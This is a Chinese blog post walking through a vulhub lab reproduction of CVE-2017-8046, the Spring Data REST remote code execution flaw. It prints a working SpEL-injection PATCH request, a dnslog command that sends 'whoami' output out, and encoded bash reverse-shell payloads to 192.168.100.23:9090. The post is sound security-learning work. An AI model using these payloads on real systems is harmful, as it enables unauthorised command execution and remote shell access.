【vulhub】Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)漏洞复现验证和getshell。

最新推荐文章于 2024-05-31 19:04:00 发布
最新推荐文章于 2024-05-31 19:04:00 发布
阅读量846 收藏 1
点赞数 1
分类专栏: vulhub 文章标签: spring boot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/119301365
版权

漏洞详情

Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。

参考链接:

http://xxlegend.com/2017/09/29/Spring%20Data%20Rest服务器PATCH请求远程代码执行漏洞CVE-2017-8046补充分析/
https://tech.meituan.com/Spring_Data_REST_远程代码执行漏洞%28CVE-2017-8046%29_分析与复现.html

影响范围

影响范围
pivotal Spring Data REST < 2.5.12 2.6.7 3.0 RC3
pivotal Spring Boot < 2.0.0M4
pivotal Spring Data < Kay-RC3

利用条件:customers目录

在这里插入图片描述

环境搭建

docker-compose up -d

等待环境启动完成,然后访问http://your-ip:8080/即可看到json格式的返回值,说明这是一个Restful风格的API服务器。
在这里插入图片描述
访问http://your-ip:8080/customers/1
在这里插入图片描述

看到一个资源。我们使用PATCH请求来修改之:
并不是我自己抓的包,这里的数据包我是用的参考文章的第一篇的数据包

PATCH /customers/1 HTTP/1.1
Host: 192.168.100.23:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

path的值是SpEL表达式,发送上述数据包,将执行new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}表示的命令touch /tmp/success

比如t的ascii码就是116,o的就是111,以此类推
在这里插入图片描述

成功发送数据包之后,

验证1

touch /tmp/success

在这里插入图片描述
可以进入docker容器内查看是否执行命令
进入docker容器:docker exec -it 容器ID /bin/bash
可以看到/tmp/目录中成功创建success
在这里插入图片描述

验证二

这里用dnslog来验证。
先获取一个dns地址
7eta0p.dnslog.cn
在这里插入图片描述
拼接命令

curl `whoami`.7eta0p.dnslog.cn

base64编码
对反弹shell的POC进行base64编码(java反弹shell都需要先编码,不然不会成功,原因貌似是runtime不支持管道符)
在这里插入图片描述
最后ascii编码

98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,51,86,121,98,67,66,103,100,50,104,118,89,87,49,112,89,67,52,51,90,88,82,104,77,72,65,117,90,71,53,122,98,71,57,110,76,109,78,117,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125

在这里插入图片描述
替换对应的payload,重新发送数据包
成功反弹回显到dnslog上
在这里插入图片描述

反弹shell

bash -i >& /dev/tcp/192.168.100.23/9090 0>&1

base64编码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}
ascii编码

98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,119,77,67,52,121,77,121,56,53,77,68,107,119,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125

在这里插入图片描述

监听9090端口
在这里插入图片描述

替换掉touch /tmp/success对应的payload,重新发送数据包
成功反弹shell
在这里插入图片描述
参考文章:
https://blog.csdn.net/baidu_38844729/article/details/107149916
https://github.com/vulhub/vulhub/tree/master/spring/CVE-2017-8046
Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)

樱浅沐冰
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
在2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
vulhubSpring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现
qq_45300786的博客
07-30 2185
利用条件 0x01 影响版本 Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring Security OAuth 2.0到2.0.14 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.3到2.3.2 0x02 默认登录账号密码 admin\admin 访问路径/oauth/auth
spring远程命令执行漏洞复现CVE-2017-8046
最新发布
2301_82197189的博客
05-31 257
Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码。
app渗透实战案例—Spring Boot Actuator未授权到脱库
good good study
12-09 7352
目录 前言 测试过程 查找敏感信息 Heapdump获取密码信息 前言 今天在做app渗透测试的时候,发现网站使用了Spring Boot框架。其存在一个未授权访问漏洞,通过寻找敏感字段获取了数据库地址和用户名,以及寻找密码获取了数据库连接密码直接拿下了数据库 测试过程 对app抓包,请求了一些服务器地址,我们将地址复制出来在浏览器访问 其中一个地址访问出现如下所示的页面,那么可以判断其使用了Spring Boot框架,Spring Boot框架是最流行的基于Java的微服务框架之一,
SpringBoot-Eureka-xstream-rce漏洞复现
tpaer的博客
11-25 8716
关于SpringBoot-Eureka-xstream-rce漏洞复现的一次实战。
漏洞复现 - - - Springboot未授权访问
热门推荐
weixin_67503304的博客
09-05 2万+
讲解了 Springboot未授权访问漏洞的原理,并且利用反弹shell的方式进行了漏洞复现,包括使用了powershell脚本文件
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
web安全第10天:两种常见漏洞
cc777777777的博客
03-15 151
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令
spring boot|一次曲折的渗透测试之旅
mingyqf的博客
03-07 720
原文链接:https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA。
Spring Data Commons 远程命令执行漏洞
m0_63241485的博客
08-17 498
Spring是一个开源框架,它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring的开发初衷:1、JAVA EE开发应该更加简单。2、使用接口而不是使用类,是更好的编程习惯。Spring将使用接口的复杂度几乎降低到了零。3、为JavaBean提供了一个更好的应用配置框架。...
vulhubSpring Messaging 远程命令执行漏洞CVE-2018-1270)漏洞验证与getshell
qq_45300786的博客
08-01 752
利用条件 影响范围 Spring Framework 5.0 to 5.0.4. Spring Framework 4.3 to 4.3.14 已不支持的旧版本仍然受影响 详细过程请看 Spring Messaging 远程命令执行漏洞CVE-2018-1270) 对反弹shell的POC进行base64编码(java反弹shell都需要先编码,不然不会成功,原因貌似是runtime不支持管道符) bash -i >& /dev/tcp/192.168.100.23/9090 0>&a
[安全漏洞公告专区]【漏洞公告】微软“周二补丁日”—2017年8月
weixin_34409703的博客
08-09 199
2017年8月8日,微软在补丁日为48个CVE漏洞发布了补丁。相对于7月来说, 本次发布的补丁涉及到的漏洞相对较轻微。在48个CVE漏洞中,总共有26个CVE被评为“关键”,21评分为“重要”和1评级为“中等”。 在所有这些漏洞中,软件和服务的安全更新包括: Adobe Flash Player Microsoft Windows Micros...
复现CVE-2017-7269(过程,步骤,说明)
XZ_______的博客
12-20 2972
配置环境:Windows server 2003 靶机 kali2.0以上版本 前言:做实验之前要确定一下靶机与攻击主机可以互相通信 一、配置Windows server 2003 靶机 1、打开添加/删除windows程序点击添加/删除windows组件 2、安装iis6.0中间件: 3、打开iis将iis中的webDAV改为允许 4、打开网站找到默认网站右击属性,将ip地址改为本机ip地址 这个时候呢我们的靶机已经配置完毕了,接下来我们来配置我们的kali 二、开启kali (第一次使用msfc
fastjson 1.2.24 反序列化导致任意命令执行漏洞
weixin_47311099的博客
12-01 3282
fastjson 1.2.24 反序列化导致任意命令执行漏洞 环境搭建vulhub一键启动 https://vulhub.org/#/environments/fastjson/1.2.24-rce/ docker-compose up -d 访问本地ip的8090端口 1.bp抓包发现对象转换成json格式数据 2.更换数据测试 右键 change request method 改成post发包,类型改为json 3.建立rmi服务器 保存java恶意代码如下,(执行 touch /tmp/succ
Apache Solr 远程命令执行漏洞 CVE-2019-0193 漏洞复现
ADummy的博客
02-28 469
Apache Solr 远程命令执行漏洞CVE-2019-0193) by ADummy 0x00利用路线 ​ 创建核心—>选择debug模式—>写入exp—>命令执行 0x01漏洞介绍 ​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值